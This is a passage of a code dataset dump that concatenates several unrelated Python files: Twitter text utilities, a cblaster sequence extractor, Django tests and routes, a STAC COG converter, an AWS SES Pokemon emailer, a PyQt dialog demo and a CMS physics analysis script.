whitespace\n (r'[0-9]+', r' -NUM- ') #Normalize numbers (NOTE: this is new, just testing out\n ]\n\ndef stripUsers(string):\n words = string.split(' ')\n return ' '.join([word for word in words if(len(word) > 0 and word[0] != '@')])\n\ndef stripContractions(words):\n return [word for word in words if(len(word) > 0 and word[0] != \"'\")]\n\ndef preprocess(string):\n for p in preprocessing:\n string = re.sub(p[0], p[1], string)\n return string\n\ncontrol_chars = ''.join(map(unichr, range(0,32) + range(127,160)))\ncontrol_char_re = re.compile('[%s]' % re.escape(control_chars))\n\ndef removeControlChars(s):\n return control_char_re.sub('', s)\n\ndef isAscii(string):\n try:\n string.decode('ascii')\n except UnicodeEncodeError:\n return False\n except UnicodeDecodeError:\n return False\n else:\n return True\n\ndef containsKana(string):\n for c in string:\n if ord(c) >= 0x3040 and ord(c) <= 0x309f:\n return True\n elif ord(c) >= 0x30A0 and ord(c) <= 0x30FF:\n return True\n return False\n\ndef isAscii_old(string):\n for i in range(len(string)):\n o = ord(string[i])\n if o > 127:\n return False\n return True\n\nZH = set([u'是', u'不', u'我', u'有', u'这', u'个', u'说', u'们', u'为', u'你', u'时', u'那', u'去', u'过', u'对', u'她', u'后', u'么'])\n\nEN = set(['it', 'he', 'she', 'going', 'day', 'tonight', 'with', 'just', 'want', 'make', 'the', 'you', 'about'])\n\nstop_list = {}\n#for line in open('stop_list'):\n# line = line.rstrip('\\n')\n# stop_list[line] = 1\nstop_list['.'] = 1\nstop_list['\"'] = 1\nstop_list[\"'\"] = 1\nstop_list[','] = 1\nstop_list[\"n't\"] = 1\nstop_list[\"-\"] = 1\nstop_list[\"(\"] = 1\nstop_list[\")\"] = 1\nstop_list[\"#\"] = 1\nstop_list[\"&\"] = 1\nstop_list[\"!\"] = 1\n\ndef filterStop(words):\n return [word for word in words if(not stop_list.has_key(word.lower()))]\n\ndef isEnglish(string):\n if not isAscii(string):\n return False\n else:\n words = nltk.word_tokenize(string)\n for word in words:\n if word in EN:\n return True\n return False\n\ndef isChinese(string):\n for c in ZH:\n if c in string and not containsKana(string):\n return True\n return False\n\ndef IncHash2(hashtable, k1, k2, ammnt=1.0):\n if not hashtable.has_key(k1):\n hashtable[k1] = {}\n if not hashtable[k1].has_key(k2):\n hashtable[k1][k2] = 0.0\n hashtable[k1][k2] += ammnt\n\ndef IncHash(hashtable, k1, ammnt=1.0):\n if not hashtable.has_key(k1):\n hashtable[k1] = 0.0\n hashtable[k1] += ammnt\n\ndef GetHashCnt(hashtable, k1):\n if not hashtable.has_key(k1):\n return 0.0\n else:\n return hashtable[k1]\n\ndef WordDict2Wordle(wordDict, outFile):\n out = open(outFile, 'w')\n sortedWords = wordDict.keys()\n sortedWords.sort(lambda a,b: cmp(wordDict[b], wordDict[a]))\n for word in sortedWords:\n out.write(\"%s:%f\\n\" % (word, wordDict[word]))\n\n","sub_path":"TwitterUtils.py","file_name":"TwitterUtils.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"382274249","text":"\"\"\"Extract sequences from session files\n\nTODO: Download hit cluster genomic regions from NCBI\n\"\"\"\n\n\nimport logging\nimport re\n\n\nfrom cblaster.classes import Session\nfrom cblaster.helpers import efetch_sequences\n\n\nLOG = logging.getLogger(__name__)\n\n\ndef parse_organisms(organisms):\n \"\"\"Parses specified organisms and creates RegEx patterns.\"\"\"\n return [\n re.compile(organism)\n for organism in organisms\n ]\n\n\ndef organism_matches(organism, patterns):\n \"\"\"Tests organism filter RegEx patterns against a given organism name.\"\"\"\n for pattern in patterns:\n if pattern.match(organism):\n return True\n return False\n\n\ndef parse_scaffolds(scaffolds):\n \"\"\"Parses scaffold names and ranges\n\n e.g.\n scaf_123 --> {\"name\": \"scaf_123\"}\n scaf_123:520-62000 --> {\"name\": \"scaf_123\", \"start\": 520, \"end\": 62000}\n \"\"\"\n records = {}\n for scaffold in scaffolds:\n name, *parts = scaffold.split(\":\")\n start = None\n end = None\n if parts:\n try:\n start, end = [int(p) for p in parts.split(\"-\")]\n except ValueError:\n LOG.exception(\"Expected range in format start-end\")\n records[name] = dict(start=start, end=name)\n return records\n\n\ndef out_of_bounds(subject, start, end):\n \"\"\"Tests if a subject overlaps with or is outside of a given range.\"\"\"\n return (\n subject.end < start\n or subject.start < start < subject.end\n or subject.start < end < subject.end\n or subject.start > end\n )\n\n\ndef flatten(array):\n \"\"\"Flattens a list of lists.\n e.g. [[1, 2, 3], [4, 5, 6]] --> [1, 2, 3, 4, 5, 6]\n \"\"\"\n flat = []\n for element in array:\n flat.extend(element)\n return flat\n\n\ndef record_to_fasta(record, delimiter=None, name_only=False):\n \"\"\"Formats a given record as FASTA.\"\"\"\n return \">{}\\n{}\".format(\n record_to_header(record, delimiter=delimiter, name_only=name_only),\n record.get(\"sequence\")\n )\n\n\ndef record_to_header(record, delimiter=None, name_only=False):\n \"\"\"Builds a header for a given record.\"\"\"\n if name_only:\n return record[\"name\"]\n fields = [\"name\", \"organism\", \"scaffold\", \"start\", \"end\"]\n values = [str(record[field]) for field in fields]\n if delimiter:\n return delimiter.join(values)\n return \"{} [organism={}] [scaffold={}:{}-{}]\".format(*values)\n\n\ndef format_records(records, delimiter=None, to_fasta=False, name_only=False):\n \"\"\"Formats records \"\"\"\n func = record_to_fasta if to_fasta else record_to_header\n return \"\\n\".join(\n func(record, delimiter=delimiter, name_only=name_only)\n for record in records\n )\n\n\ndef extract_records(\n session,\n in_cluster=True,\n queries=None,\n organisms=None,\n scaffolds=None,\n):\n \"\"\"Extracts subject sequence names from a session file.\"\"\"\n if organisms:\n organisms = parse_organisms(organisms)\n if scaffolds:\n scaffolds = parse_scaffolds(scaffolds)\n records = []\n for organism in session.organisms:\n if organisms and not organism_matches(organism.name, organisms):\n continue\n for accession, scaffold in organism.scaffolds.items():\n if scaffolds:\n if accession not in scaffolds:\n continue\n record = scaffolds[accession]\n start = record.get(\"start\")\n end = record.get(\"end\")\n else:\n start = None\n end = None\n if in_cluster:\n subjects = flatten(cluster for cluster in scaffold.clusters)\n else:\n subjects = scaffold.subjects\n for subject in subjects:\n if (start and end) and out_of_bounds(subject, start, end):\n continue\n if queries and not any(h.query in queries for h in subject.hits):\n continue\n record = dict(\n name=subject.name,\n organism=organism.name,\n scaffold=scaffold.accession,\n start=subject.start,\n end=subject.end,\n )\n records.append(record)\n return records\n\n\ndef extract(\n session,\n in_cluster=True,\n delimiter=None,\n name_only=False,\n download=False,\n output=None,\n queries=None,\n organisms=None,\n scaffolds=None,\n):\n \"\"\"Extract subject sequences from a cblaster session.\n\n Parameters:\n session (Session): cblaster Session object\n in_cluster: (bool): Only sequences in clusters are extracted\n download (bool): Download hit sequences from NCBI\n output (str): Output file name\n queries (list): Query sequence names\n organisms (list): Organism filtering regular expressions\n scaffolds (list): Scaffold names and ranges\n delimiter (str): Sequence description delimiter character\n name_only (bool): Do not save sequence descriptions\n \"\"\"\n LOG.info(\"Starting cblaster extraction\")\n LOG.info(\"Loading session from: %s\", session)\n with open(session) as fp:\n session = Session.from_json(fp)\n\n LOG.info(\"Extracting subject sequences matching filters\")\n records = extract_records(\n session,\n in_cluster=in_cluster,\n queries=queries,\n organisms=organisms,\n scaffolds=scaffolds,\n )\n\n if download:\n LOG.info(\"Fetching %i sequences from NCBI\", len(records))\n headers = [record.get(\"name\") for record in records]\n sequences = efetch_sequences(headers)\n for record in records:\n record[\"sequence\"] = sequences.get(record[\"name\"])\n\n # FASTA format if downloading from NCBI, otherwise newline separated IDs\n text = format_records(\n records,\n delimiter=delimiter,\n to_fasta=download,\n name_only=name_only,\n )\n\n if output:\n with open(output, \"w\") as fp:\n LOG.info(\"Writing output to %s\", fp.name)\n fp.write(text)\n else:\n print(text)\n\n LOG.info(\"Done!\")\n return records\n","sub_path":"cblaster/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"76321051","text":"# -*- coding: utf-8 -*-\nfrom django.test import TestCase\nfrom apps.hello.models import Bio\nfrom django.core.urlresolvers import reverse\n\n\nclass TestView(TestCase):\n def setUp(self):\n \"\"\"creating user\"\"\"\n Bio.objects.all().delete()\n person = Bio(\n name='Andrew', last_name='Minikh',\n date_of_birth='1998-04-10', bio='Student, junior python developer',\n email='falkesmoon@gmail.com', jabber='falkesmoon@42cc.co',\n skype='falkesmoon', other_contacts='vk.com/falkesmoon')\n person.save()\n self.url = reverse('home')\n\n def test_main_page(self):\n \"\"\" test view to render correct template and return code 200\"\"\"\n response = self.client.get(self.url)\n self.assertTemplateUsed(response, 'main.html')\n self.assertEqual(response.status_code, 200)\n\n def test_render_page(self):\n \"\"\" test view rendering correct data if db have 3 entries\"\"\"\n Bio.objects.create(name=\"qwerty\", last_name=\"qwerty\")\n Bio.objects.create(name=\"zxcv\", last_name=\"zxcv\")\n first_user = Bio.objects.first()\n response = self.client.get(self.url)\n self.assertEqual(response.context['aboutme'], first_user)\n self.assertIn('Andrew', response.content)\n self.assertIn('Minikh', response.content)\n self.assertIn('April 10, 1998', response.content)\n self.assertIn('Student, junior python developer', response.content)\n self.assertIn('falkesmoon@gmail.com', response.content)\n self.assertIn('falkesmoon@42cc.co', response.content)\n self.assertIn('falkesmoon', response.content)\n self.assertIn('vk.com/falkesmoon', response.content)\n\n def test_do_db_entries(self):\n \"\"\" test view to show message if no db entries exist\"\"\"\n Bio.objects.all().delete()\n response = self.client.get(self.url)\n self.assertIn('No active user is found.', response.content)\n\n def test_cyrillic_db(self):\n \"\"\" test view if db have cyrillic symbols \"\"\"\n Bio.objects.all().delete()\n Bio.objects.create(\n name='Андрій', last_name='Мініх',\n bio='Студент, розробник')\n first_user = Bio.objects.first()\n response = self.client.get(self.url)\n self.assertEqual(response.context['aboutme'], first_user)\n self.assertIn('Андрій', response.content)\n self.assertIn('Мініх', response.content)\n self.assertIn('Студент, розробник', response.content)\n","sub_path":"apps/hello/tests/test_views_home.py","file_name":"test_views_home.py","file_ext":"py","file_size_in_byte":2545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"219046662","text":"import os\nfrom tempfile import TemporaryDirectory\nimport pystac\nfrom pystac.extensions.eo import EOExtension\nfrom pystac.extensions.projection import ProjectionExtension\nfrom stactools.nrcan_spot_ortho.stac_templates import image_types\nfrom stactools.nrcan_spot_ortho.geobase_ftp import GeobaseSpotFTP\nfrom stactools.nrcan_spot_ortho.stac_templates import (spot_bands, spot_pan,\n proj_epsg)\nfrom stactools.nrcan_spot_ortho.utils import (CustomStacIO, download_from_ftp,\n call, get_existing_paths, unzip,\n upload_to_s3)\nfrom urllib.parse import urlparse\nimport rasterio\n\npystac.StacIO.set_default(CustomStacIO)\n\n\ndef cogify(input_path, output_path, overwrite, existing_cog_paths):\n \"\"\"COGify a geotiff at input_path to a cloud optimized geotiff at output_path.\n \"\"\"\n print(f\"COGifying {os.path.basename(input_path)}\")\n failure = False\n parsed = urlparse(output_path)\n\n if (not overwrite) and (output_path in existing_cog_paths):\n print(f\"Skipping {os.path.basename(output_path)}, already COGified.\")\n\n elif parsed.scheme == \"s3\":\n with TemporaryDirectory() as tmp_dir:\n tmp_path = os.path.join(tmp_dir, os.path.basename(output_path))\n failure = call([\n 'gdal_translate', '-of', 'COG', '-co', 'compress=deflate',\n input_path, tmp_path\n ])\n upload_to_s3(parsed, tmp_path)\n\n else:\n failure = call([\n 'gdal_translate', '-of', 'COG', '-co', 'compress=deflate',\n input_path, output_path\n ])\n\n if failure:\n print(f\"Could not COGify to {output_path}\")\n raise\n\n\ndef include_cog_asset(item, cog_path, cog_proj):\n \"\"\"Mutate a STAC item to include a COG at cog_path with the\n projection cog_proj as an asset.\n \"\"\"\n # Include the COG as an asset\n cog_filename = os.path.basename(cog_path)\n title = [v for k, v in image_types.items() if k in cog_filename][0]\n asset = pystac.Asset(href=cog_path,\n media_type=pystac.MediaType.COG,\n roles=['data'],\n title=title)\n\n # Provide band and projection information for the asset\n eo_ext = EOExtension.ext(asset)\n if title == \"pan\":\n eo_ext.apply([spot_pan[cog_filename[:2].upper()]])\n else:\n eo_ext.apply([spot_bands[title]])\n proj_ext = ProjectionExtension.ext(asset)\n proj_ext.epsg = proj_epsg[cog_proj]\n with rasterio.open(cog_path) as src:\n proj_ext.transform = src.transform\n proj_ext.bbox = src.bounds\n # proj_ext.projjson = src.crs.to_dict(proj_json=True)\n proj_ext.wkt2 = src.crs.wkt\n asset.properties['gsd'] = src.res[0]\n\n item.assets[title] = asset\n\n\ndef cogify_item(item,\n cog_directory,\n overwrite,\n existing_cog_paths,\n existing_tn_paths,\n cog_proj=\"lcc00\"):\n \"\"\"Create COGs from the GeoTIFF asset contained in the passed in STAC item.\n Mutates the item to include assets for the new COGs.\n\n Args:\n item (pystac.Item): Item that contains assets that will be converted to\n COGs.\n cog_directory (str): A URI of a directory to store COGs. This will be used\n in conjunction with the file names based on the COG asset to store\n the COG data. If None is passed then store COGs in the location given\n by the self_href of the item.\n overwrite (bool): Whether to overwrite existing COG files.\n existing_cog_paths (list): List of existing COG locations.\n existing_tn_paths (List): List of existing thumbnail locations.\n cog_proj (str): Imagery is stored in LCC projection as well as local UTM\n projections. Choose which of these projections to convert to COG (LCC\n recommended, as it covers all of Canada).\n \"\"\"\n if cog_directory is None:\n cog_directory = os.path.dirname(item.get_self_href())\n\n with TemporaryDirectory() as tmp_dir:\n # Get asset names associated with the chosen projection\n asset_names = [k for k in item.assets.keys() if cog_proj in k.lower()]\n\n for asset_name in asset_names:\n zip_href = item.assets[asset_name].href\n\n if not overwrite:\n # predict cog file names\n fname_base = os.path.basename(zip_href).replace(\n f\"_{cog_proj}.zip\", \"\")\n bands = range(1, 5) if fname_base[-3:] == \"m20\" else [1]\n cog_paths = [\n os.path.join(\n cog_directory,\n f\"{s}{fname_base[1:]}_{i}_{cog_proj}_cog.tif\")\n for i in bands for s in [\"s\", \"S\"]\n ]\n\n # check if predicted file names exist and include as asset if so\n exists = False\n for cog_path in cog_paths:\n if cog_path in existing_cog_paths:\n include_cog_asset(item, cog_path, cog_proj)\n exists = True\n\n # skip download/unzip/cogify if any exist (assume all done)\n if exists:\n print(f\"Skipping {asset_name}, already COGified.\")\n continue\n\n # Download zip file\n zip_path = os.path.join(tmp_dir, os.path.basename(zip_href))\n success = download_from_ftp(zip_href, zip_path, GeobaseSpotFTP())\n if not success:\n continue\n\n # Unzip images\n non_cog_paths = [\n f for f in unzip(zip_path, tmp_dir) if '.tif' in f.lower()\n ]\n\n # For each image, COGify and include as an asset\n for non_cog_path in non_cog_paths:\n # COGify\n cog_filename = (os.path.basename(non_cog_path).replace(\n '.tif', '_cog.tif'))\n cog_path = os.path.join(cog_directory, cog_filename)\n cogify(non_cog_path, cog_path, overwrite, existing_cog_paths)\n include_cog_asset(item, cog_path, cog_proj)\n\n # Download the thumbnail to the same location as the COGs, checking\n # if already downloaded first\n tn_href = item.assets[\"thumbnail\"].href\n if cog_directory not in tn_href:\n tn_fname = os.path.basename(tn_href)\n tn_path = os.path.join(cog_directory, tn_fname)\n parsed = urlparse(tn_path)\n\n success = False\n if tn_path not in existing_tn_paths:\n if (parsed.scheme == \"s3\"):\n tmp_tn_path = os.path.join(tmp_dir, tn_fname)\n success = download_from_ftp(tn_href, tmp_tn_path,\n GeobaseSpotFTP())\n if success:\n upload_to_s3(parsed, tmp_tn_path)\n\n else:\n success = download_from_ftp(tn_href, tn_path,\n GeobaseSpotFTP())\n\n if success:\n item.assets[\"thumbnail\"].href = tn_path\n\n\ndef cogify_catalog(catalog_path, cog_directory=None, overwrite=False):\n \"\"\"Crawl a catalog, find zipped imagery hrefs within items, download/unzip/COGify\n these, include the results as new assets.\n\n Args:\n catalog_path (str): The file path of the root STAC catalog.\n cog_directory (str): A URI of a directory to store COGs. This will be used\n in conjunction with the file names based on the COG asset to store\n the COG data. If None is passed then store COGs in the location given\n by the self_href of the item.\n overwrite (bool): Whether to overwrite existing COG files.\n \"\"\"\n # Open catalog\n spot_catalog = pystac.read_file(catalog_path)\n\n # Read cog_directory contents to speed up checks for existing files\n check_dir = cog_directory if cog_directory else os.path.dirname(\n catalog_path)\n print(f\"Getting contents of {check_dir}...\")\n existing_cog_paths = get_existing_paths(check_dir, ending=\"_cog.tif\")\n existing_tn_paths = get_existing_paths(check_dir, ending=\"_tn.jpg\")\n\n count = 0\n for _, _, items in spot_catalog.walk():\n\n for item in items:\n count += 1\n print(f\"\\n{item.id}... {count}\")\n\n # Skip if COGified already and overwrite==False\n cogified = (\"B1\" in item.assets.keys()) and (item.assets[\"B1\"].href\n in existing_cog_paths)\n\n # cogified = \"B1\" in item.assets.keys()\n if (not cogified) or (cogified and overwrite):\n\n # COGify item's assets and save item\n cogify_item(item, cog_directory, overwrite, existing_cog_paths,\n existing_tn_paths)\n # spot_catalog.normalize_and_save(os.path.dirname(catalog_path),\n # spot_catalog.catalog_type)\n item.save_object()\n\n else:\n print(f\"Skipping {item.id}, already COGified.\")\n","sub_path":"src/stactools/nrcan_spot_ortho/cog.py","file_name":"cog.py","file_ext":"py","file_size_in_byte":9253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"493572076","text":"import os\nimport boto3\nfrom dotenv import load_dotenv\nfrom integrations.api import PokemonApi\nfrom requests.exceptions import HTTPError\nload_dotenv()\n\n\nSOURCE = os.getenv('SOURCE_EMAIL')\nSUBJECT = 'Informações sobre pokemons'\n\n\ndef validate_body(body):\n if 'pokemon_type' not in body:\n raise Exception('Missing pokemon_type parameter.')\n if 'destination' not in body:\n raise Exception('Missing destination parameter.')\n if (\n not isinstance(body['pokemon_type'], str) or\n not (\n isinstance(body['destination'], str) or\n isinstance(body['destination'], list)\n )\n ):\n raise Exception('Invalid JSON.')\n\n return body\n\n\ndef send_email(event, context):\n body = validate_body(event['body'])\n pokemon_type = body['pokemon_type']\n destination = body['destination']\n\n if isinstance(destination, str):\n destination = [destination]\n\n try:\n urls = PokemonApi().get_urls_by_type(pokemon_type)\n pokemons_info = PokemonApi().get_pokemons_info(urls)\n\n content = ''\n for info in pokemons_info:\n content += f''\n content += f'

    Nome do pokemon: {info[\"name\"]}

    '\n content += f'

    Peso: {info[\"weight\"]} kg

    '\n content += f'

    Altura: {info[\"height\"]} m

    '\n content += f'

    Experiência base: {info[\"base_experience\"]}

    '\n\n TEMPLATE = f\"\"\"\n \n \n \n

    Olá Treinador Pokemon,

    \n

    Aqui estão as informações de 5 pokémons aleatórios do\n tipo {pokemon_type} que podem ser interessantes para você\n capturar durante a sua jornada.

    \n {content}\n

    Gotta Catch 'Em All!

    \n

    See ya!

    \n \n \n \"\"\"\n\n client = boto3.client('ses')\n\n response = client.send_email(\n Destination={\n 'ToAddresses': destination\n },\n Message={\n 'Body': {\n 'Html': {\n 'Charset': 'UTF-8',\n 'Data': TEMPLATE,\n }\n },\n 'Subject': {\n 'Charset': 'UTF-8',\n 'Data': SUBJECT,\n },\n },\n Source=SOURCE,\n )\n\n return response\n except Exception as e:\n if isinstance(e, HTTPError):\n raise Exception('Resource not found.')\n raise Exception('Internal Error.')\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"37576202","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/4/19 11:11\n# @Author : Wei\n# @Email : 592190443@qq.com\n# @File : urls.py\n# @Software: PyCharm\nfrom django.urls import path,re_path\n\n\nfrom .views import OrgView,UserAskView,OrgHomeView,OrgCourseView,OrgTeacherView,OrgDescView,AddFavView,TeacherListView,TeacherDetail\n\n\napp_name = \"organization\"\nurlpatterns = [\n\n # 课程组织结构\n path('list/', OrgView.as_view(),name='org_list'), #组织结构首页\n\n path('user_ask/',UserAskView.as_view(),name='user_ask'), #用户咨询ajax请求处理\n\n re_path('^home/(?P\\d+)$', OrgHomeView.as_view(), name=\"org_home\"), #处理从机构列表页到机构主页的url\n\n re_path('^course/(?P\\d+)$', OrgCourseView.as_view(), name=\"org_course\"), #机构主页到课程页\n\n re_path('teacher/(?P\\d+)$', OrgTeacherView.as_view(), name=\"org_teacher\"), #机构主页到老师详情页\n\n re_path('^desc/(?P\\d+)$', OrgDescView.as_view(), name=\"org_desc\"), #机构主页到机构详情页\n\n path('add_fav/',AddFavView.as_view(),name = \"add_fav\"), #处理点赞ajax请求\n\n #讲师\n path('teacher/list/', TeacherListView.as_view(), name=\"teacher_list\"), # 讲师列表页\n re_path('teacher/detail/(?P\\d+)$', TeacherDetail.as_view(), name=\"teacher_detail\"), # 讲师详情页\n\n\n\n]","sub_path":"mymooc/apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"609756265","text":"balance = 42\nannualInterestRate = .2\nmonthlyPaymentRate = .04\n\nmonthlyInterestRate = annualInterestRate/12.0\nminimumPayment = monthlyPaymentRate*balance\n\nfor i in range(0,12):\n balance -= monthlyPaymentRate*balance\n balance += balance*monthlyInterestRate\n\nprint(\"Month \"+str(i)+ \" remaining balance: \"+str(round(balance,2)))\n","sub_path":"Scratchpad/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"75898157","text":"import unittest\nfrom unittest.mock import patch\n\nfrom daemonsan.util import dynamo\nfrom daemonsan.model import team\n\n\nclass TestTeam(unittest.TestCase):\n def test_get(self):\n mock_ret = {\n 'Item': {\n 'team_id': {'S': 'abc1234'},\n 'team_name': {'S': 'the_team'},\n 'oauth_token': {'S': 'xyzw-1234abc'}\n }\n }\n with patch.object(dynamo.dynamodb, 'get_item', return_value=mock_ret):\n t = team.get('abc1234')\n dynamo.dynamodb.get_item.assert_called_with(\n TableName=team.Team.TABLE_NAME,\n Key={'team_id': {'S': 'abc1234'}})\n self.assertEqual(t.team_id, 'abc1234')\n self.assertEqual(t.team_name, 'the_team')\n self.assertEqual(t.oauth_token, 'xyzw-1234abc')\n\n def test_put(self):\n with patch.object(dynamo.dynamodb, 'put_item'):\n team.put('abc1234', 'the_team', 'xyzw-1234abc')\n dynamo.dynamodb.put_item.assert_called_with(\n TableName=team.Team.TABLE_NAME,\n Item={\n 'team_id': {'S': 'abc1234'},\n 'team_name': {'S': 'the_team'},\n 'oauth_token': {'S': 'xyzw-1234abc'}\n })\n","sub_path":"test/model/test_team.py","file_name":"test_team.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"234171593","text":"import sys\nfrom PyQt5.QtWidgets import *\n\n\nclass DlgMain(QDialog):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Input Dialog\")\n self.resize(300, 300)\n\n self.btn = QPushButton(\"Enter name\", self)\n self.btn.move(50, 50)\n self.btn.clicked.connect(self.evt_btn_clicked)\n\n self.btn_age = QPushButton(\"Enter your age\", self)\n self.btn_age.move(50, 80)\n self.btn_age.clicked.connect(self.evt_btn_age_clicked)\n\n self.btn_cost_coffee = QPushButton(\"Enter coffe price\", self)\n self.btn_cost_coffee.move(50, 110)\n self.btn_cost_coffee.clicked.connect(self.evt_btn_cost_coffee_clicked)\n\n self.btn_color = QPushButton(\"Pick your color\", self)\n self.btn_color.move(50, 140)\n self.btn_color.clicked.connect(self.evt_btn_color_clicked)\n\n def evt_btn_color_clicked(self):\n lstColor = [\"Red\", \"Green\", \"Blue\"]\n sColor, bOk = QInputDialog.getItem(self, \"Color\", \"Pick your favorit color\", lstColor, editable=False)\n if bOk:\n QMessageBox.information(self, \"Color\", \"Your favorit color is \" + sColor)\n else:\n QMessageBox.critical(self, \"Text\", \"You did pick color\")\n return\n\n def evt_btn_cost_coffee_clicked(self):\n sCoffe, bOk = QInputDialog.getDouble(self, \"Price\", \"Please enter coffe price\", 2.00, 0.10, 10.00, 2)\n if bOk:\n if sCoffe <= 5:\n QMessageBox.information(self, \"Coffe price\", \"You paid your coffe \" + str(sCoffe))\n if sCoffe > 5 :\n QMessageBox.question(self, \"Price\", \"You realy paid {0} for the fu** coffe\".format(sCoffe))\n res = QMessageBox.question(self, \"Realy?\", \"No Realy you paid your coffe {0}\".format(sCoffe))\n if res == QMessageBox.Yes:\n QMessageBox.critical(self, \"Idiote\", \"Ti stvarno nisi normalan\")\n else:\n QMessageBox.information(self, \"Sala?\", \"dobro je nisi puko\")\n else:\n QMessageBox.information(self, \"\", \"User canceled\")\n\n\n \n def evt_btn_age_clicked(self):\n sAge, bOk = QInputDialog.getInt(self, \"Age\", \"Please enter your age\", 18, 18, 65, 1)\n if bOk:\n QMessageBox.information(self, \"Age\", \"Your age is \" + str(sAge))\n else:\n QMessageBox.critical(self, \"Error\", \"You did not entered your age\")\n\n\n def evt_btn_clicked(self):\n sName, bOk = QInputDialog.getText(self, \"Text\", \"Enter your name:\")\n if bOk:\n QMessageBox.information(self, \"Name\", \"Your name is \" + sName)\n else:\n QMessageBox.critical(self, \"Text\", \"You did not entered your name\")\n return\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n dlgMain = DlgMain()\n dlgMain.show()\n sys.exit(app.exec_())\n","sub_path":"20_QInputDialog.py","file_name":"20_QInputDialog.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"433799331","text":"import math\nimport copy\n\ndef deltaR2( e1, p1, e2=None, p2=None):\n \"\"\"Take either 4 arguments (eta,phi, eta,phi) or two objects that have 'eta', 'phi' methods)\"\"\"\n if (e2 == None and p2 == None):\n return deltaR2(e1.eta(),e1.phi(), p1.eta(), p1.phi())\n de = e1 - e2\n dp = deltaPhi(p1, p2)\n return de*de + dp*dp\n\ndef deltaPhi( p1, p2):\n '''Computes delta phi, handling periodic limit conditions.'''\n res = p1 - p2\n while res > math.pi:\n res -= 2*math.pi\n while res < -math.pi:\n res += 2*math.pi\n return res\n\n# import ROOT in batch mode\nimport sys\noldargv = sys.argv[:]\nsys.argv = [ '-b-' ]\nimport ROOT\nROOT.gROOT.SetBatch(True)\nsys.argv = oldargv\n\nfrom ctypes import c_uint8\n\n# load FWLite C++ libraries\nROOT.gSystem.Load(\"libFWCoreFWLite.so\")\nROOT.gSystem.Load(\"libDataFormatsFWLite.so\")\nROOT.AutoLibraryLoader.enable()\n\n# Create histograms, etc.\nROOT.gROOT.SetStyle('Plain') # white background\nH_ElectronEta = ROOT.TH1F (\"ElectronEta\",\"ElectronEta\",60,-3.,+3.)\nH_ElectronEta_Fake = ROOT.TH1F (\"ElectronEta_Fake\",\"ElectronEta_Fake\",60,-3.,+3.)\n\n# load FWlite python libraries\nfrom DataFormats.FWLite import Handle, Events\n\ngenpars, genParLabel = Handle(\"std::vector\"), \"prunedGenParticles\"\npgenpars, pgenParLabel = Handle(\"std::vector\"), \"packedGenParticles\"\nmuons, muonLabel = Handle(\"std::vector\"), \"slimmedMuons\"\nelectrons, electronLabel = Handle(\"std::vector\"), \"slimmedElectrons\"\nphotons, photonLabel = Handle(\"std::vector\"), \"slimmedPhotons\"\ntaus, tauLabel = Handle(\"std::vector\"), \"slimmedTaus\"\njets, jetLabel = Handle(\"std::vector\"), \"slimmedJets\"\nfatjets, fatjetLabel = Handle(\"std::vector\"), \"slimmedJetsAK8\"\nmets, metLabel = Handle(\"std::vector\"), \"slimmedMETs\"\nvertices, vertexLabel = Handle(\"std::vector\"), \"offlineSlimmedPrimaryVertices\"\npfcands, pfcandLabel = Handle(\"std::vector\"), \"packedPFCandidates\"\n\nverticesScore = Handle(\"edm::ValueMap\")\n\n# open file (you can use 'edmFileUtil -d /store/whatever.root' to get the physical file name)\n#events = Events('file:step4_inMINIAODSIM.root')\n#events = Events('file:/cms/data/store/user/hatake/RelValQCD_FlatPt_15_3000HS_14/pfvalidation/200906_033704/0000/step3_inMINIAODSIM_1.root')\n#events = Events('file:/cms/data/store/user/hatake/RelValQCD_FlatPt_15_3000HS_14/pfvalidation/200905_204656/0000/step3_inMINIAODSIM_1.root')\n# test\n#\nlistFiles=[\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_1.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_2.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_3.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_5.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_6.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_7.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_8.root',\n 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012317/0000/step3_inMINIAODSIM_9.root'\n]\n# ref\n# listFiles=[\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_1.root',\n# 'file:/cms/data/store/user/hatake/RelValZEE_14/pfvalidation/200908_012521/0000/step3_inMINIAODSIM_2.root',\n# 